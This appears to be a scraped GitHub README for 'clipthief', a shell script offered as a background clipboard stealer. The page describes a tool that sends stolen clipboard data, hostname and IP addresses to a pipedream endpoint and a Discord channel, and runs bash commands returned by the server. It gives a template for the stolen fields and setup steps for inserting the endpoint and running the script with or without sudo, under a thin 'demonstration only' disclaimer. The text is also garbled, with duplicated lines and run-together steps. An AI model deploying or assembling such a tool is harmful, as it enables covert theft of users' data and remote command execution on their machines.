Loading repository data…
Loading repository data…
rhijjawi / repository
A rudimentary shell script that waits in the background and steals clipboard data, posts it to a server (and executes the bash in the response), and sends the clipboard data, along with other useful info to a discord channel.
A rudimentary shell script that waits in the background and steals clipboard data, posts it to a server (and executes the bash in the response), and sends the clipboard data, along with other useful info to a discord channel.
steps.send_message_advanced-------------------------------------------------
Host Name --> {{event.body.localhostname}}
Local Time --> {{steps.trigger.context.ts}}
Public IP --> {{steps.trigger.event.client_ip}}
Local IP --> {{steps.trigger.event.body.localip}}
Clipboard Data --> {{event.body.clipboard}}
-------------------------------------------------
steps.trigger (https://xxxxxxxxxxxxx.m.pipedream.net)REPLACE_ME in clipthief.sh with your endpointsudo ./clifthief.sh or ./clipthief.sh if the user does not have root privileges or the root password is unknown.script field in steps.http_responseThis script is for demonstration purposes ONLY. I (rhijjawi) am in no way responsible for your actions. Have fun :D.